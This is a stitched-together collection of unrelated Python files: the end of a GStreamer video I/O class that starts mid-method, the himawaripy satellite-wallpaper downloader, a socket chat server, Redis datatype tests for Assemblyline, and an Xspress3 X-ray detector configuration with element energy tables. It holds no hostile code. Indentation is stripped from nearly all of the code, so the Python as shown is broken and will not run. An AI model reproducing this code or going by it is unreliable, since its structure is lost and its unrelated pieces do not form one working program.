pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
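# For illustration: for a plain video file with no NVIDIA plugins installed,
# the method above returns roughly
#   filesrc location=file.mp4 ! decodebin ! videoscale !
#   video/x-raw, width=1280, height=720 !videoconvert ! appsink sync=false
# where the width/height come from the `size` passed to the constructor.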
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# for file (non-live) input, block until there is room so no frames are dropped
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
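# Minimal usage sketch (not part of the original module). 'input.mp4' and the
# output path are placeholder assumptions; any URI listed in the class docstring
# would work the same way.
if __name__ == '__main__':
    stream = VideoIO(size=(1280, 720), input_uri='input.mp4', output_uri='output/out.mp4')
    stream.start_capture()
    try:
        while True:
            frame = stream.read()
            if frame is None:
                break
            stream.write(frame)
    finally:
        stream.release()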
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
import subprocess
import appdirs
from PIL import Image
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 1, 0)
counter = None
HEIGHT = 550
WIDTH = 550
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
print("Offset is greater than +11, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
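# For illustration: with --offset 2 (UTC+02:00) the function above computes
# offset = 2 - 10 = -8, so the requested image time is the latest Himawari
# timestamp shifted back by 8 hours.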
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
sys.exit('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
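# For illustration: with level=4 the full image is stitched from 4x4 tiles, and
# the request for tile (0, 0) of 2024-01-01 00:00 UTC would hit
#   http://himawari8.nict.go.jp/img/D531106/4d/550/2024/01/01/000000_0_0.png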
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="himawaripy", appauthor=False))
parser.add_argument("--dont-change", action="store_true", dest="dont_change", default=False,
help="don't change the wallpaper (just download it)")
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def thread_main(args):
global counter
counter = mp.Value("i", 0)
level = args.level # since we are going to use it a lot of times
print("Updating...")
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
requested_time = calculate_time_offset(latest, args.auto_offset, args.offset)
if args.auto_offset or args.offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (args.level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
for file in iglob(path.join(args.output_dir, "himawari-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("himawari-%Y%m%dT%H%M%S.png", requested_time))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if not args.dont_change:
r = set_background(output_file)
if not r:
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
else:
print("Not changing your wallpaper as requested.")
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
server.py
|
'''
Server Side code
'''
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import subprocess
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf-8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
while True:
try:
SERVER.bind(ADDR)
break
except OSError:
subprocess.call('sudo lsof -t -i tcp:33000 | xargs kill -9', shell=True)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
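# Minimal client sketch (not part of the original file), matching the protocol
# above: connect, send your name first, then chat messages; send "{quit}" to leave.
#
#   from socket import AF_INET, socket, SOCK_STREAM
#   client = socket(AF_INET, SOCK_STREAM)
#   client.connect(("localhost", 33000))
#   print(client.recv(1024).decode("utf8"))      # greeting from the server
#   client.send(bytes("alice", "utf8"))          # first message is the name
#   client.send(bytes("hello everyone", "utf8"))
#   client.send(bytes("{quit}", "utf8"))
#   client.close()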
|
test_remote_datatypes.py
|
import pytest
import random
import time
from threading import Thread
from assemblyline.common.uid import get_random_id
# noinspection PyShadowingNames
def test_hash(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.hash import Hash
with Hash('test-hashmap') as h:
assert h.add("key", "value") == 1
assert h.exists("key") == 1
assert h.get("key") == "value"
assert h.set("key", "new-value") == 0
assert h.keys() == ["key"]
assert h.length() == 1
assert h.items() == {"key": "new-value"}
assert h.pop("key") == "new-value"
assert h.length() == 0
# Make sure we can limit the size of a hash table
assert h.limited_add("a", 1, 2) == 1
assert h.limited_add("a", 1, 2) == 0
assert h.length() == 1
assert h.limited_add("b", 10, 2) == 1
assert h.length() == 2
assert h.limited_add("c", 1, 2) is None
assert h.length() == 2
assert h.pop("a")
# Can we increment integer values in the hash
assert h.increment("a") == 1
assert h.increment("a") == 2
assert h.increment("a", 10) == 12
assert h.increment("a", -22) == -10
# noinspection PyShadowingNames
def test_expiring_hash(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.hash import ExpiringHash
with ExpiringHash('test-expiring-hashmap', ttl=1) as eh:
assert eh.add("key", "value") == 1
assert eh.length() == 1
time.sleep(1.1)
assert eh.length() == 0
# noinspection PyShadowingNames
def test_basic_counters(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.counters import Counters
with Counters('test-counter') as ct:
ct.delete()
for x in range(10):
ct.inc('t1')
for x in range(20):
ct.inc('t2', value=2)
ct.dec('t1')
ct.dec('t2')
assert sorted(ct.get_queues()) == ['test-counter-t1',
'test-counter-t2']
assert ct.get_queues_sizes() == {'test-counter-t1': 9,
'test-counter-t2': 39}
ct.reset_queues()
assert ct.get_queues_sizes() == {'test-counter-t1': 0,
'test-counter-t2': 0}
# noinspection PyShadowingNames
def test_tracked_counters(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.counters import Counters
with Counters('tracked-test-counter', track_counters=True) as ct:
ct.delete()
for x in range(10):
ct.inc('t1')
for x in range(20):
ct.inc('t2', value=2)
assert ct.tracker.keys() == ['t1', 't2']
ct.dec('t1')
ct.dec('t2')
assert ct.tracker.keys() == []
assert sorted(ct.get_queues()) == ['tracked-test-counter-t1',
'tracked-test-counter-t2']
assert ct.get_queues_sizes() == {'tracked-test-counter-t1': 9,
'tracked-test-counter-t2': 39}
ct.reset_queues()
assert ct.get_queues_sizes() == {'tracked-test-counter-t1': 0,
'tracked-test-counter-t2': 0}
# noinspection PyShadowingNames
def test_sets(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.set import Set
with Set('test-set') as s:
s.delete()
values = ['a', 'b', 1, 2]
assert s.add(*values) == 4
assert s.length() == 4
for x in s.members():
assert x in values
assert s.random() in values
assert s.exist(values[2])
s.remove(values[2])
assert not s.exist(values[2])
pop_val = s.pop()
assert pop_val in values
assert not s.exist(pop_val)
assert s.length() == 2
assert s.limited_add('dog', 3)
assert not s.limited_add('cat', 3)
assert s.exist('dog')
assert not s.exist('cat')
assert s.length() == 3
# noinspection PyShadowingNames
def test_expiring_sets(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.set import ExpiringSet
with ExpiringSet('test-expiring-set', ttl=1) as es:
es.delete()
values = ['a', 'b', 1, 2]
assert es.add(*values) == 4
assert es.length() == 4
assert es.exist(values[2])
for x in es.members():
assert x in values
time.sleep(1.1)
assert es.length() == 0
assert not es.exist(values[2])
# noinspection PyShadowingNames
def test_lock(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.lock import Lock
def locked_execution(next_thread=None):
with Lock('test', 10):
if next_thread:
next_thread.start()
time.sleep(2)
t2 = Thread(target=locked_execution)
t1 = Thread(target=locked_execution, args=(t2,))
t1.start()
time.sleep(1)
assert t1.is_alive()
assert t2.is_alive()
time.sleep(2)
assert not t1.is_alive()
assert t2.is_alive()
time.sleep(2)
assert not t1.is_alive()
assert not t2.is_alive()
# noinspection PyShadowingNames,PyUnusedLocal
def test_priority_queue(redis_connection):
from assemblyline.remote.datatypes.queues.priority import PriorityQueue
with PriorityQueue('test-priority-queue') as pq:
pq.delete()
for x in range(10):
pq.push(100, x)
pq.push(101, 'a')
pq.push(99, 'z')
assert pq.pop() == 'a'
assert pq.unpush() == 'z'
assert pq.count(100, 100) == 10
assert pq.pop() == 0
assert pq.unpush() == 9
assert pq.length() == 8
assert pq.pop(4) == [1, 2, 3, 4]
assert pq.unpush(3) == [6, 7, 8]
assert pq.length() == 1 # Should be [<100, 5>] at this point
for x in range(5):
pq.push(100 + x, x)
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=106) == []
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=103) == [4] # 3 and 4 are both options, 4 has higher score
assert pq.dequeue_range(lower_limit=102, skip=1) == [2] # 2 and 3 are both options, 3 has higher score, skip it
assert pq.dequeue_range(upper_limit=100, num=10) == [5, 0] # Take some off the other end
assert pq.length() == 2
pq.pop(2)
pq.push(50, 'first')
pq.push(-50, 'second')
assert pq.dequeue_range(0, 100) == ['first']
assert pq.dequeue_range(-100, 0) == ['second']
# noinspection PyShadowingNames,PyUnusedLocal
def test_unique_priority_queue(redis_connection):
from assemblyline.remote.datatypes.queues.priority import UniquePriorityQueue
with UniquePriorityQueue('test-priority-queue') as pq:
pq.delete()
for x in range(10):
pq.push(100, x)
assert pq.length() == 10
# Values should be unique, this should have no effect on the length
for x in range(10):
pq.push(100, x)
assert pq.length() == 10
pq.push(101, 'a')
pq.push(99, 'z')
assert pq.pop() == 'a'
assert pq.unpush() == 'z'
assert pq.count(100, 100) == 10
assert pq.pop() == 0
assert pq.unpush() == 9
assert pq.length() == 8
assert pq.pop(4) == [1, 2, 3, 4]
assert pq.unpush(3) == [6, 7, 8]
assert pq.length() == 1 # Should be [<100, 5>] at this point
for x in range(5):
pq.push(100 + x, x)
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=106) == []
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=103) == [4] # 3 and 4 are both options, 4 has higher score
assert pq.dequeue_range(lower_limit=102, skip=1) == [2] # 2 and 3 are both options, 3 has higher score, skip it
assert sorted(pq.dequeue_range(upper_limit=100, num=10)) == [0, 5] # Take some off the other end
assert pq.length() == 2
pq.pop(2)
pq.push(50, 'first')
pq.push(-50, 'second')
assert pq.dequeue_range(0, 100) == ['first']
assert pq.dequeue_range(-100, 0) == ['second']
# noinspection PyShadowingNames
def test_named_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.named import NamedQueue, select
with NamedQueue('test-named-queue') as nq:
nq.delete()
for x in range(5):
nq.push(x)
assert nq.length() == 5
nq.push(*list(range(5)))
assert nq.length() == 10
assert nq.peek_next() == nq.pop()
assert nq.peek_next() == 1
v = nq.pop()
assert v == 1
assert nq.peek_next() == 2
nq.unpop(v)
assert nq.peek_next() == 1
assert select(nq) == ('test-named-queue', 1)
with NamedQueue('test-named-queue-1') as nq1:
nq1.delete()
with NamedQueue('test-named-queue-2') as nq2:
nq2.delete()
nq1.push(1)
nq2.push(2)
assert select(nq1, nq2) == ('test-named-queue-1', 1)
assert select(nq1, nq2) == ('test-named-queue-2', 2)
# noinspection PyShadowingNames
def test_multi_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.multi import MultiQueue
mq = MultiQueue()
mq.delete('test-multi-q1')
mq.delete('test-multi-q2')
for x in range(5):
mq.push('test-multi-q1', x+1)
mq.push('test-multi-q2', x+6)
assert mq.length('test-multi-q1') == 5
assert mq.length('test-multi-q2') == 5
assert mq.pop('test-multi-q1') == 1
assert mq.pop('test-multi-q2') == 6
assert mq.length('test-multi-q1') == 4
assert mq.length('test-multi-q2') == 4
mq.delete('test-multi-q1')
mq.delete('test-multi-q2')
assert mq.length('test-multi-q1') == 0
assert mq.length('test-multi-q2') == 0
# noinspection PyShadowingNames
def test_comms_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.comms import CommsQueue
def publish_messages(message_list):
time.sleep(0.1)
with CommsQueue('test-comms-queue') as cq_p:
for message in message_list:
cq_p.publish(message)
msg_list = ["bob", 1, {"bob": 1}, [1, 2, 3], None, "Nice!", "stop"]
t = Thread(target=publish_messages, args=(msg_list,))
t.start()
with CommsQueue('test-comms-queue') as cq:
x = 0
for msg in cq.listen():
if msg == "stop":
break
assert msg == msg_list[x]
x += 1
t.join()
assert not t.is_alive()
|
21-xspress3.py
|
from ophyd.device import (Component as Cpt)
from hxntools.detectors.xspress3 import (Xspress3FileStore,
Xspress3Channel)
from hxntools.detectors.hxn_xspress3 import HxnXspress3DetectorBase
import itertools
import threading
import numpy as np
from ophyd import DeviceStatus
class HxnXspress3Detector(HxnXspress3DetectorBase):
channel1 = Cpt(Xspress3Channel, 'C1_', channel_num=1)
channel2 = Cpt(Xspress3Channel, 'C2_', channel_num=2)
channel3 = Cpt(Xspress3Channel, 'C3_', channel_num=3)
# Currently only using three channels. Uncomment these to enable more
# channels:
# channel4 = C(Xspress3Channel, 'C4_', channel_num=4)
# channel5 = C(Xspress3Channel, 'C5_', channel_num=5)
# channel6 = C(Xspress3Channel, 'C6_', channel_num=6)
# channel7 = C(Xspress3Channel, 'C7_', channel_num=7)
# channel8 = C(Xspress3Channel, 'C8_', channel_num=8)
hdf5 = Cpt(Xspress3FileStore, 'HDF5:',
write_path_template='/data/%Y/%m/%d/',
mds_key_format='xspress3_ch{chan}',
reg=db.reg,
root='/data',
)
def __init__(self, prefix, *, configuration_attrs=None, read_attrs=None,
**kwargs):
if configuration_attrs is None:
configuration_attrs = ['external_trig', 'total_points',
'spectra_per_point']
if read_attrs is None:
read_attrs = ['channel1', 'channel2', 'channel3', 'hdf5']
super().__init__(prefix, configuration_attrs=configuration_attrs,
read_attrs=read_attrs, **kwargs)
self._dispatch_cid = None
self._spec_saved = threading.Event()
def stage(self, *args, **kwargs):
for j in itertools.count():
try:
ret = super().stage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < N_try:
print(f"failed to stage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
# clear any existing callback
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
# always install the callback
def _handle_spectrum_capture(old_value, value, timestamp, **kwargs):
# if we get called while we are in fly mode, unsubscribe ourselves and bail;
# the flyscan takes care of this itself, but does not tell us we are in fly
# mode until after we are staged
if self.mode_settings.scan_type.get() != 'step':
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
return
# grab the time and the previous value from the callback payload
trigger_time = timestamp
self._abs_trigger_count = old_value
# dispatch for all of the channels
for sn in self.read_attrs:
if sn.startswith('channel') and '.' not in sn:
ch = getattr(self, sn)
self.dispatch(ch.name, trigger_time)
#print(ch.name, trigger_time, self._abs_trigger_count)
self._abs_trigger_count = value
self._spec_saved.set()
# do the actual subscribe
self._dispatch_cid = self.hdf5.num_captured.subscribe(
_handle_spectrum_capture,
run=False)
return ret
def trigger(self):
self.sts = sts = DeviceStatus(self)
# in the not step case, just return a done status object
if self.mode_settings.scan_type.get() != 'step':
sts._finished()
return sts
self._spec_saved.clear()
def monitor():
success = self._spec_saved.wait(60)
sts._finished(success=success)
# hold a ref for gc reasons
self._th = threading.Thread(target=monitor)
self._th.start()
return sts
def unstage(self, *args, **kwargs):
try:
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
finally:
for j in itertools.count():
try:
ret = super().unstage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < N_try:
print(f"failed to unstage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
return ret
xspress3 = HxnXspress3Detector('XF:03IDC-ES{Xsp:1}:', name='xspress3')
# Create directories on the xspress3 server, otherwise scans can fail:
xspress3.make_directories.put(True)
elem_K_list = np.array(['Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe','Cs','Ba','La','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf'])
energy_K_list = np.array([1040,1254,1487,1740,2011,2310,2622,2958,3314,3692,4093,4512,4953,5415,5900,6405,6931,7480,8046,8637,9251,9886,10543,11224,11924,12648,13396,14165,14958,15775,16615,17480,18367,19279,20216,21177,22163,23173,24210,25271,26359,27473,28612,29775,30973,32194,33442,55790,57535,59318,61141,63000,64896,66831,68806,70818,72872,74970,77107,79291,81516,83785,86106,88478,90884,34720,36027,37361,38725,40118,41542,42996,44482,45999,47547,49128,50742,52388,54070,93351,95868,98440,101059,103734,106472,109271,112121,115032])
elem_L_list = np.array(['Zn_L','Ga_L','Ge_L','AS_L','Se_L','Br_L','Kr_L','Rb_L','Sr_L','Y_L','Zr_L','Nb_L','Mo_L','Tc_L','Ru_L','Rh_L','Pd_L','Ag_L','Cd_L','In_L','Sn_L','Sb_L','Te_L','I_L','Xe_L','Cs_L','Ba_L','La_L','Hf_L','Ta_L','W_L','Re_L','Os_L','Ir_L','Pt_L','Au_L','Hg_L','Tl_L','Pb_L','Bi_L','Po_L','At_L','Rn_L','Fr_L','Ra_L','Ac_L','Ce_L','Pr_L','Nd_L','Pm_L','Sm_L','Eu_L','Gd_L','Tb_L','Dy_L','Ho_L','Er_L','Tm_L','Yb_L','Lu_L','Th_L','Pa_L','U_L','Np_L','Pu_L','Am_L','Cm_L','Bk_L','Cf_L'])
energy_L_list = np.array([1012,1098,1186,1282,1379,1481,1585,1692,1806,1924,2044,2169,2292,2423,2558,2697,2838,2983,3133,3280,3444,3604,3768,3938,4110,4285,4467,4647,7899,8146,8398,8652,8911,9175,9442,9713,9989,10269,10551,10839,11131,11427,11727,12031,12339,12652,4839,5035,5228,5432,5633,5850,6053,6273,6498,6720,6949,7180,7416,7655,12968,13291,13614,13946,14282,14620,14961,15308,15660])
elem_M_list = np.array(['Hf_M','Ta_M','W_M','Re_M','Os_M','Ir_M','Pt_M','Au_M','Hg_M','Tl_M','Pb_M','Bi_M','Po_M','At_M','Rn_M','Fr_M','Ra_M','Ac_M','Ce_M','Pr_M','Nd_M','Pm_M','Sm_M','Eu_M','Gd_M','Tb_M','Dy_M','Ho_M','Er_M','Tm_M','Yb_M','Lu_M','Th_M','Pa_M','U_M','Np_M','Pu_M','Am_M','Cm_M','Bk_M','Cf_M'])
energy_M_list = np.array([1646,1712,1775,1840,1907,1976,2048,2118,2191,2267,2342,2418,2499,2577,2654,2732,2806,2900,884,927,979,1023,1078,1122,1181,1233,1284,1342,1404,1463,1526,1580,2990,3071,3164,3250,3339,3429,3525,3616,3709])
def xspress3_roi_setup():
elem_list = np.array(['Cu','Si','Mo_L','P','Os_M','P','Pt_M','Mg','Fe','Cr','Sr_L','Pd_L','Ni','Au_M', 'Mn', 'S'])
num_elem = np.size(elem_list)
if num_elem > 16:
num_elem = 16
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
for i in range(num_elem):
if elem_list[i] in elem_K_list:
energy = energy_K_list[elem_K_list == elem_list[i]]
elif elem_list[i] in elem_L_list:
energy = energy_L_list[elem_L_list == elem_list[i]]
elif elem_list[i] in elem_M_list:
energy = energy_M_list[elem_M_list == elem_list[i]]
else:
print(elem_list[i], 'is not defined.')
break
channel.set_roi(i+1, energy-150, energy+150, name=elem_list[i])
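# For illustration: 'Fe' resolves to a K-line energy of 6405 eV in the tables
# above, so the loop sets an ROI of [6255, 6555] eV (a +/-150 eV window) named
# 'Fe' on each of the three channels.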
'''
def xspress3_roi_setup():
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
#channel.set_roi(1, 9300, 9600, name='Pt')
channel.set_roi(1, 1590, 1890, name='Si')
#channel.set_roi(2, 1898, 2198, name='Pt_M')
#channel.set_roi(2, 2150, 2450, name='S')
#channel.set_roi(2, 14000, 14300, name='Sr')
#channel.set_roi(2, 3790, 4090, name='I')
#channel.set_roi(2, 3850, 4140, name='Bi_M')
#channel.set_roi(2, 3300, 3600, name='Sn')
channel.set_roi(4, 8250, 8550, name='W')
channel.set_roi(2, 4690, 4990, name='Ce')
#channel.set_roi(3, 4150, 4450, name='Cs')
#channel.set_roi(2, 2019, 2319, name='Nb')
#channel.set_roi(3, 5700, 6000, name='Eu')
channel.set_roi(3, 4360, 4660, name='Ti')
#channel.set_roi(3, 6800, 7100, name='Er')
#channel.set_roi(5, 4250, 4550, name='Ba')
channel.set_roi(5, 4150, 4450, name='Cs')
#channel.set_roi(3, 1970, 2270, name='Au_M')
#channel.set_roi(4, 5750, 6050, name='Mn')
#channel.set_roi(5, 2472, 2772, name='Cl')
#channel.set_roi(5, 2200, 2500, name='Pb_M')
#channel.set_roi(5, 2810, 3110, name='Ag')
#channel.set_roi(5, 6780, 7080, name='Co')
channel.set_roi(6, 3542, 3842, name='Ca')
channel.set_roi(7, 3130, 3430, name='In')
channel.set_roi(8, 5900, 6200, name='Gd')
channel.set_roi(9, 5078, 5378, name='Nd')
#channel.set_roi(9, 4800, 5100, name='V')
#channel.set_roi(7, 1850, 2150, name='P')
#channel.set_roi(8, 3000, 3300, name='Cd')
channel.set_roi(10, 5270, 5570, name='Cr')
#channel.set_roi(9, 3160, 3460, name='K')
#channel.set_roi(10, 10400, 10700, name='Pb')
#channel.set_roi(10, 3600, 3900, name='Te')
#channel.set_roi(11, 9550, 9850, name='Au')
channel.set_roi(11, 6250, 6550, name='Fe')
channel.set_roi(12, 11050, 11350, name='Se')
#channel.set_roi(13, 8487, 8787, name='Zn')
channel.set_roi(13, 8000, 8300, name='Ta')
channel.set_roi(14, 7330, 7630, name='Ni')
#channel.set_roi(15, 7950, 8150, name='Cu')
channel.set_roi(15, 9300, 9600, name='Pt')
#channel.set_roi(16, 11775, 12075, name='Br')
#channel.set_roi(16, 9736, 10036, name='Ge')
# channel.set_roi(17, 8250, 8550, 'W')
# channel.set_roi(18, 9600, 9750, 'Au')
# channel.set_roi(19, 11500, 12500, 'EL')
# channel.set_roi(20, 1900, 2000, 'Y')
# channel.set_roi(15, 1340, 1640, name='Al')
# channel.set_roi(22, 4360, 4660, 'Ti')
# channel.set_roi(23, 4550, 4750, 'La')
channel.set_roi(16, 9150, 9350, name='Ga')
'''
try:
print('Configuring Xspress3 ROIs...')
xspress3_roi_setup()
print('Done')
except KeyboardInterrupt:
print('Xspress3 ROI configuration cancelled.')
def hint_xspress_element(elm):
elm = elm.upper()
xspress3.hints['fields'] = [f'Det{j}_{elm}' for j in (1, 2, 3)]
